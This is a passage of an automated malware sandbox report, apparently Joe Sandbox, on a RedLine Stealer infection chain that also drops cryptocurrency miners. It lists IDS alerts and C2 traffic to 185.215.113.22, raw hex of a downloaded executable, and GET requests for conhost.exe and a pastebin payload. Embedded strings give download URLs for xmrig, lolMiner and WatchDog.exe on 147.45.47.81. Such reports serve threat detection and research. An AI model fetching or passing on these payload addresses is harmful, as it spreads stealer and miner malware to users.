                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h23_2_030C4668
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 032FD87Ah23_2_032FD7B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 032FDA54h23_2_032FD7B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 032FDA67h23_2_032FD7B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 032FCC89h23_2_032FC878
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 032FD794h23_2_032FCCA8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 032FD794h23_2_032FD372
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 032FD794h23_2_032FD370
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 032FD87Ah23_2_032FD7A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 032FDA54h23_2_032FD7A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 032FD794h23_2_032FD592
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]23_2_032F6D0F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]23_2_032F6D0D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 032FD794h23_2_032FCC98

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.5:49704 -> 185.215.113.22:80
                  Source: Network trafficSuricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.5:49704 -> 185.215.113.22:80
                  Source: Network trafficSuricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 185.215.113.22:80 -> 192.168.2.5:49704
                  Source: Malware configuration extractorURLs: 185.215.113.22:80
                  Source: unknownDNS query: name: pastebin.com
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 22_2_00301280 std::_Xinvalid_argument,GetTickCount,GetTickCount,Sleep,GetTickCount,GetModuleHandleW,GetSystemInfo,FindResourceW,LoadResource,URLDownloadToFileA,ShellExecuteA,GetProcAddress,LockResource,GetProcAddress,VirtualProtect,Concurrency::cancel_current_task,22_2_00301280
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 29 Sep 2024 07:44:12 GMTContent-Type: application/octet-streamContent-Length: 3125704Last-Modified: Tue, 20 Aug 2024 12:02:17 GMTConnection: keep-aliveETag: "66c485c9-2fb1c8"Accept-Ranges: bytesData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 58 05 30 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 d4 4e 00 00 00 00 00 00 00 00 00 00 c0 75 2f 00 08 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e 8e 01 00 00 10 00 00 00 90 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 da 3b 00 00 00 a0 01 00 00 3c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 4d 00 00 00 e0 01 00 00 0a 00 00 00 ce 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d4 4e 00 00 00 30 02 00 00 50 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 55 8b ec a1 60 e9 41 00 81 ec 04 09 00 00 53 33 db 3b c3 56 57 74 1f 66 39 1d 62 e9 41 00 74 07 ff d0 a3 60 e9 41 00 50 e8 50 14 00 00 50 e8 ef 84 00 00 59 eb 6e 6a 27 e8 40 14 00 00 8b 75 08 ff 76 0c 8b 3d c0 a2 41 00 ff 36 50 8d 85 fc f6 ff ff 50 ff d7 83 c4 14 39 5e 10 89 5d fc 76 38 8d 5e 14 ff 33 8d 85 fc fe ff ff 68 90 a4 41 00 50 ff d7 83 c4 0c 8d 85 fc fe ff ff 50 8d 85 fc f6 ff ff 50 ff 15 78 a1 41 00 ff 45 fc 8b 45 fc 83 c3 04 3b 46 10 72 cb 8d 85 fc f6 ff ff 50 e8 7e 84 00 00 59 e8 d4 36 00 00 6a 0a ff 15 74 a1 41 00 cc ff 74 24 04 e8 44 ff ff ff cc 56 8b f1 e8 25 73 00 00 c7 06 a0 a4 41 00 c7 46 38 d2 07 00 00 8b c6 5e c3 6a 01 ff 71 04 ff 15 bc a2 41 00 c3 33 c0 39 05 60 ea 41 00 74 07 b8 04 40 00 80 eb 1e 39 44 24 08 74 16 ff 74 24 08 50 68 02 80 00 00 ff 35 58 ea 41 00 ff 15 b8 a2 41 00 33 c0 c2 08 00 8b 44 24 04 83 60 1c 00 83 7c 24 08 00 75 07 c7 40 1c 01 00 00 00 33 c0 c2 08 00 a0 70 e9 41 00 f6 d8 1b c0 83 e0 0b 83 c0 08 c3 ff 74 24 10 8b 44 24 08 ff 74 24 10 c7 05 60 e9 41 00 2f 11 40 00 ff 74 24 10 8b 08 50 ff 51 0c 83 25 60 e9 41 00 00 c3 33 c0 c2 0c 00 8b 54 24 08 8b 4c 24 04 0f b7 02 66 89 01 41 41 42 42 66 85 c0 75 f1 c3 8b 4c 24 04 33 c0 66 39
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 29 Sep 2024 07:44:12 GMTContent-Type: application/octet-streamContent-Length: 3125704Last-Modified: Tue, 20 Aug 2024 12:02:17 GMTConnection: keep-aliveETag: "66c485c9-2fb1c8"Accept-Ranges: bytesData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 58 05 30 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 d4 4e 00 00 00 00 00 00 00 00 00 00 c0 75 2f 00 08 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e 8e 01 00 00 10 00 00 00 90 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 da 3b 00 00 00 a0 01 00 00 3c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 4d 00 00 00 e0 01 00 00 0a 00 00 00 ce 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d4 4e 00 00 00 30 02 00 00 50 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 55 8b ec a1 60 e9 41 00 81 ec 04 09 00 00 53 33 db 3b c3 56 57 74 1f 66 39 1d 62 e9 41 00 74 07 ff d0 a3 60 e9 41 00 50 e8 50 14 00 00 50 e8 ef 84 00 00 59 eb 6e 6a 27 e8 40 14 00 00 8b 75 08 ff 76 0c 8b 3d c0 a2 41 00 ff 36 50 8d 85 fc f6 ff ff 50 ff d7 83 c4 14 39 5e 10 89 5d fc 76 38 8d 5e 14 ff 33 8d 85 fc fe ff ff 68 90 a4 41 00 50 ff d7 83 c4 0c 8d 85 fc fe ff ff 50 8d 85 fc f6 ff ff 50 ff 15 78 a1 41 00 ff 45 fc 8b 45 fc 83 c3 04 3b 46 10 72 cb 8d 85 fc f6 ff ff 50 e8 7e 84 00 00 59 e8 d4 36 00 00 6a 0a ff 15 74 a1 41 00 cc ff 74 24 04 e8 44 ff ff ff cc 56 8b f1 e8 25 73 00 00 c7 06 a0 a4 41 00 c7 46 38 d2 07 00 00 8b c6 5e c3 6a 01 ff 71 04 ff 15 bc a2 41 00 c3 33 c0 39 05 60 ea 41 00 74 07 b8 04 40 00 80 eb 1e 39 44 24 08 74 16 ff 74 24 08 50 68 02 80 00 00 ff 35 58 ea 41 00 ff 15 b8 a2 41 00 33 c0 c2 08 00 8b 44 24 04 83 60 1c 00 83 7c 24 08 00 75 07 c7 40 1c 01 00 00 00 33 c0 c2 08 00 a0 70 e9 41 00 f6 d8 1b c0 83 e0 0b 83 c0 08 c3 ff 74 24 10 8b 44 24 08 ff 74 24 10 c7 05 60 e9 41 00 2f 11 40 00 ff 74 24 10 8b 08 50 ff 51 0c 83 25 60 e9 41 00 00 c3 33 c0 c2 0c 00 8b 54 24 08 8b 4c 24 04 0f b7 02 66 89 01 41 41 42 42 66 85 c0 75 f1 c3 8b 4c 24 04 33 c0 66 39
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 29 Sep 2024 07:44:12 GMTContent-Type: application/octet-streamContent-Length: 3125704Last-Modified: Tue, 20 Aug 2024 12:02:17 GMTConnection: keep-aliveETag: "66c485c9-2fb1c8"Accept-Ranges: bytesData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 58 05 30 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 d4 4e 00 00 00 00 00 00 00 00 00 00 c0 75 2f 00 08 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e 8e 01 00 00 10 00 00 00 90 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 da 3b 00 00 00 a0 01 00 00 3c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 4d 00 00 00 e0 01 00 00 0a 00 00 00 ce 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d4 4e 00 00 00 30 02 00 00 50 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 55 8b ec a1 60 e9 41 00 81 ec 04 09 00 00 53 33 db 3b c3 56 57 74 1f 66 39 1d 62 e9 41 00 74 07 ff d0 a3 60 e9 41 00 50 e8 50 14 00 00 50 e8 ef 84 00 00 59 eb 6e 6a 27 e8 40 14 00 00 8b 75 08 ff 76 0c 8b 3d c0 a2 41 00 ff 36 50 8d 85 fc f6 ff ff 50 ff d7 83 c4 14 39 5e 10 89 5d fc 76 38 8d 5e 14 ff 33 8d 85 fc fe ff ff 68 90 a4 41 00 50 ff d7 83 c4 0c 8d 85 fc fe ff ff 50 8d 85 fc f6 ff ff 50 ff 15 78 a1 41 00 ff 45 fc 8b 45 fc 83 c3 04 3b 46 10 72 cb 8d 85 fc f6 ff ff 50 e8 7e 84 00 00 59 e8 d4 36 00 00 6a 0a ff 15 74 a1 41 00 cc ff 74 24 04 e8 44 ff ff ff cc 56 8b f1 e8 25 73 00 00 c7 06 a0 a4 41 00 c7 46 38 d2 07 00 00 8b c6 5e c3 6a 01 ff 71 04 ff 15 bc a2 41 00 c3 33 c0 39 05 60 ea 41 00 74 07 b8 04 40 00 80 eb 1e 39 44 24 08 74 16 ff 74 24 08 50 68 02 80 00 00 ff 35 58 ea 41 00 ff 15 b8 a2 41 00 33 c0 c2 08 00 8b 44 24 04 83 60 1c 00 83 7c 24 08 00 75 07 c7 40 1c 01 00 00 00 33 c0 c2 08 00 a0 70 e9 41 00 f6 d8 1b c0 83 e0 0b 83 c0 08 c3 ff 74 24 10 8b 44 24 08 ff 74 24 10 c7 05 60 e9 41 00 2f 11 40 00 ff 74 24 10 8b 08 50 ff 51 0c 83 25 60 e9 41 00 00 c3 33 c0 c2 0c 00 8b 54 24 08 8b 4c 24 04 0f b7 02 66 89 01 41 41 42 42 66 85 c0 75 f1 c3 8b 4c 24 04 33 c0 66 39
                  Source: global trafficHTTP traffic detected: GET /raw/dq3hWX27 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /conhost.exe HTTP/1.1Host: 147.45.47.81Connection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
                  Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
                  Source: Joe Sandbox ViewIP Address: 185.215.113.22 185.215.113.22
                  Source: Joe Sandbox ViewIP Address: 185.215.113.22 185.215.113.22
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: global trafficHTTP traffic detected: GET /4Ak49WQH0GE3Nr.mp3 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: joxi.netConnection: Keep-Alive
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.22
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 22_2_00301280 std::_Xinvalid_argument,GetTickCount,GetTickCount,Sleep,GetTickCount,GetModuleHandleW,GetSystemInfo,FindResourceW,LoadResource,URLDownloadToFileA,ShellExecuteA,GetProcAddress,LockResource,GetProcAddress,VirtualProtect,Concurrency::cancel_current_task,22_2_00301280
                  Source: global trafficHTTP traffic detected: GET /raw/dq3hWX27 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /conhost.exe HTTP/1.1Host: 147.45.47.81Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /4Ak49WQH0GE3Nr.mp3 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: joxi.netConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: api.ip.sb
                  Source: global trafficDNS traffic detected: DNS query: joxi.net
                  Source: global trafficDNS traffic detected: DNS query: pastebin.com
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Sep 2024 07:44:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.4.45Cache-Control: no-cacheVary: Accept-LanguageVary: Accept-LanguageCF-Cache-Status: BYPASSSet-Cookie: js=TDXdxR9wpSLEfe3duHHmkl2DL-m5CFjOCB8aEB3BMPMV6LAwi7quqy7NYHeLalZaDJDQeYWeP1SmJAhV6czAi3; path=/Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NrNfJO6YQEW%2BJa7wXSIGb5se52VS0%2FAdoigHXpNZkdQRQdFOjGFk%2BE7bNNrIFL%2BETpdYLqXksAvLOv2tEbfKameT9WcbPSGLvPr401JJZ0kjcqdr2KqALRP87g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Speculation-Rules: "/cdn-cgi/speculation"Server: cloudflareCF-RAY: 8caa58fe49738c77-EWRContent-Encoding: gzipData Raw: 33 34 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 74 94 cf 8e db 36 10 c6 ef 7e 0a 56 17 49 85 2c 7a b7 0e 90 d6 92 80 a4 09 0a f4 90 f4 90 1c 0a c3 28 b8 14 2d 73 57 16 15 92 5e af 91 0d b0 f1 06 41 8b 2d 10 a0 b9 f5 0d 7a 73 36 eb d6 89 ff 04 e8 13 0c 5f a1 4f 52 50 b2 9d 14 41 75 10 21 ce 37 3f 72 46 fc 18 7d 71 ef e1 b7 8f 7e fc e1 3e 1a e8 61 9e 34 a2 dd c0 48 9a 34 10 42 28 1a 32 4d 10 1d 10 a9 98 8e 9d 91 ee 37 6f 3b db 90 e6 3a 67 c9 f7 e2 8c a3 7f 2e 5e 23 73 09 37 b0 81 37 b0 86 99 79 85 e0 83 b9 80 0d bc 35 17 30 83 15 ac 60 86 e0 06 96 e6 15 32 cf e1 bd b9 80 05 ac cd cf b0 31 53 d8 c0 35 82 05 aa 92 57 30 b7 00 64 5e c0 0c de c1 b2 4a 5e 20 f8 00 1b 9b 38 37 53 58 44 b8 5e ba de 46 ce 8b 13 34 90 ac 1f 3b b8 4f 4e 39 15 45 c8 a9 70 90 64 79 ec a8 81 90 9a 8e 34 b2 f3 0e d2 93 92 c5 0e 1f 92 8c e1 b3 66 35 f7 29 a6 4e d1 93 9c a9 01 63 da d9 71 31 4d 8b f0 58 9c f1 50 8e 30 51 8a 69 85 a9 52 b8 dd 6a 87 54 29 27 69 d4 10 45 25 2f 75 4d f4 fa a3 82 6a 2e 0a 8f 07 2a 10 41 16 c8 80 04 43 ff 29 ef ba df 09 91 e5 ec 4e 41 f2 89 e6 54 3d 3c 3a 66 54 bb bd 58 76 78 57 f6 62 fb 3a 3f df e7 fb 4f 2b 60 05 b5 a1 f0 49 5c 0f e7 e7 dd 9e 1f 96 23 35 f0 88 cc 46 43 56 68 e5 3f 0b aa 60 1e 1f 7c 59 b0 31 ba 47 34 f3 Data Ascii: 34ct6~VI,z(-sW^A-zs6_ORPAu!7?rF}q~>a4H4B(2M7o;:g.^#s77y50`21S5W0d^J^ 87SXD^F4;ON9Epdy4f5)Ncq1MXP0QiRjT)'iE%/uMj.*AC)NAT=<:fTXvxWb:?O+`I\#5FCVh?`|Y1G4
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000031BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81
                  Source: RegSvcs.exe, 00000017.00000002.2339213093.0000000003321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/WatchDog.exe
                  Source: Installer.exe, 00000016.00000002.2282337473.000000000031C000.00000004.00000001.01000000.0000000D.sdmp, Installer.exe, 00000016.00000003.2281553518.0000000003542000.00000040.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.2334616398.0000000000402000.00000020.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/WatchDog.exeAhttp://147.45.47.81/lolMiner.exe;http://147.45.47.81/xmrig.exe
                  Source: RegSvcs.exe, 00000017.00000002.2339213093.0000000003321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/WinRing0x64.sys
                  Source: Installer.exe, 00000016.00000002.2282337473.000000000031C000.00000004.00000001.01000000.0000000D.sdmp, Installer.exe, 00000016.00000003.2281553518.0000000003542000.00000040.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.2334616398.0000000000402000.00000020.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/WinRing0x64.sysChttps://pastebin.com/raw/dq3hWX27
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000031BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/conhost.exe
                  Source: RegSvcs.exe, 00000017.00000002.2339213093.0000000003321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/lolMiner.exe
                  Source: RegSvcs.exe, 00000017.00000002.2339213093.0000000003321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/xmrig.exe
                  Source: Installer.exe.20.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                  Source: conhost.exe.3.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003226000.00000004.00000800.00020000.00000000.sdmp, conhost.exe.3.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
                  Source: Installer.exe.20.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA2.crl0t
                  Source: conhost.exe.3.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003226000.00000004.00000800.00020000.00000000.sdmp, conhost.exe.3.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
                  Source: Installer.exe.20.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA2.crt0#
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
